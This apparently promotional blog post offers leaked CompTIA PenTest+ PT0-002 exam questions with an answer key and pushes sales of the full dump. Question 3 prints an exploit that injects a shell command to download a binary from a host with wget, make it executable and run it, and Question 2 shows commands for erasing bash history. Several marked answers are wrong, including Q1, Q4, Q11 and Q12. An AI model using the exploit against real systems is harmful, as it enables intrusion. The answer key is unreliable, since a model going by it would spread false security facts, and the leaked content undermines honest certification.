latest CompTIA PenTest+ PT0-002 dumps (PDF or VCE) practice question answers for free

What really helps with the CompTIA PenTest+ Certification PT0-002 exam is the real CompTIA PenTest+ PT0-002 dumps hands-on exercises. You can learn and memorize all day long. Share the latest CompTIA PenTest+ PT0-002 dumps (PDF or VCE) practice question answers for free here to help you with your exam.

Updated CompTIA PenTest+ PT0-002 dumps https://www.pass4itsure.com/pt0-002.html ( PT0-002 PDF, PT0-002 VCE).

The cool thing about this blog is that it not only shares your free PT0-002 exam questions but also guides you to the full PT0-002 dump address and finally successfully passes the CompTIA PenTest+ Certification exam by using it.

CompTIA PenTest+ certification exam practice test

QUESTION 1

A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would BEST support this task?

A. Run Nmap with the –o, -p22, and –sC options set against the target
B. Run Nmap with the –SV and –p22 options set against the target
C. Run Nmap with the –script vulners option set against the target
D. Run Nmap with the –SA option set against the target

Correct Answer: D

QUESTION 2

A penetration tester gains access to a system and establishes persistence, and then runs the following commands: cat /dev/null > temp touch –r .bash_history temp mv temp .bash_history

Which of the following actions is the tester MOST likely performing?

A. Redirecting Bash history to /dev/null
B. Making a copy of the user\\’s Bash history for further enumeration
C. Covering tracks by clearing the Bash history
D. Making decoy files on the system to confuse incident responders

Correct Answer: C


Reference: https://null-byte.wonderhowto.com/how-to/clear-logs-bash-history-hacked-linux-systems-cover-your-tracksremain-undetected-0244768/

QUESTION 3

A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:

exploit = “POST “
exploit += “/cgi-bin/index.cgi?action=loginandPath=%27%0A/bin/sh${IFS} –
c${IFS}\\’cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IS}./apache\\’%0A%27andloginUser=aandPwd=a” exploit += “HTTP/1.1”

Which of the following commands should the penetration tester run post-engagement?

A. grep –v apache ~/.bash_history > ~/.bash_history
B. rm –rf /tmp/apache
C. chmod 600 /tmp/apache
D. taskkill /IM “apache” /F

Correct Answer: B

QUESTION 4

A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good.

Which of the following recommendations should the penetration tester include in the report?

A. Add a dependency checker into the tool chain.
B. Perform routine static and dynamic analysis of committed code.
C. Validate API security settings before deployment.
D. Perform fuzz testing of compiled binaries.

Correct Answer: D

QUESTION 5

Which of the following types of information should be included when writing the remediation section of a penetration test report to be viewed by the systems administrator and technical staff?

A. A quick description of the vulnerability and a high-level control to fix it
B. Information regarding the business impact if compromised
C. The executive summary and information regarding the testing company
D. The rules of engagement from the assessment

Correct Answer: B

QUESTION 6

A company becomes concerned when the security alarms are triggered during a penetration test. Which of the following should the company do NEXT?

A. Halt the penetration test.
B. Conduct an incident response.
C. Deconflict with the penetration tester.
D. Assume the alert is from the penetration test.

Correct Answer: B

QUESTION 7

Appending string values onto another string is called:

A. compilation
B. connection
C. concatenation
D. conjunction

Correct Answer: C

Reference: https://docs.microsoft.com/en-us/dotnet/csharp/how-to/concatenate-multiple-strings

QUESTION 8

Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?

A. NDA
B. MSA
C. SOW
D. MOU

Correct Answer: C

QUESTION 9

A penetration tester recently performed a social-engineering attack in which the tester found an employee of the target company at a local coffee shop and over time built a relationship with the employee. On the employee\’s birthday, the tester gave the employee an external hard drive as a gift.

Which of the following social-engineering attacks was the tester utilizing?

A. Phishing
B. Tailgating
C. Baiting
D. Shoulder surfing

Correct Answer: C

QUESTION 10

A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations.

Which of the following are considered passive reconnaissance tools? (Choose two.)

A. Wireshark
B. Nessus
C. Retina
D. Burp Suite
E. Shodan
F. Nikto

Correct Answer: AE

Reference: https://resources.infosecinstitute.com/topic/top-10-network-recon-tools/

QUESTION 11

A penetration tester wants to perform reconnaissance without being detected. Which of the following activities have a MINIMAL chance of detection? (Choose two.)

A. Open-source research
B. A ping sweep
C. Traffic sniffing
D. Port knocking
E. A vulnerability scan
F. An Nmap scan

Correct Answer: EF

Reference: https://www.sciencedirect.com/topics/computer-science/passive-reconnaissance

QUESTION 12

Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)

A. Buffer overflows
B. Cross-site scripting
C. Race-condition attacks
D. Zero-day attacks
E. Injection flaws
F. Ransomware attacks

Correct Answer: AB

Reference: https://owasp.org/www-pdf-archive/OWASP_Top_10_2017_RC2_Final.pdf

latest [Google Drive] PT0-002 dumps pdf

free PT0-002 exam pdf https://drive.google.com/file/d/1zwc7704P4XKsApW-7v6iJXaMFJ_dCe75/view?usp=sharing

Passed PenTest+, here’s how:

Learn with Pass4itSure PT0-002 dumps PDF+ VCE. Complete the PT0-002 practice test. Access the https://www.pass4itsure.com/pt0-002.html via the discount code “CompTIA” to purchase the full CompTIA PenTest+ PT0-002 dumps at the cheapest price.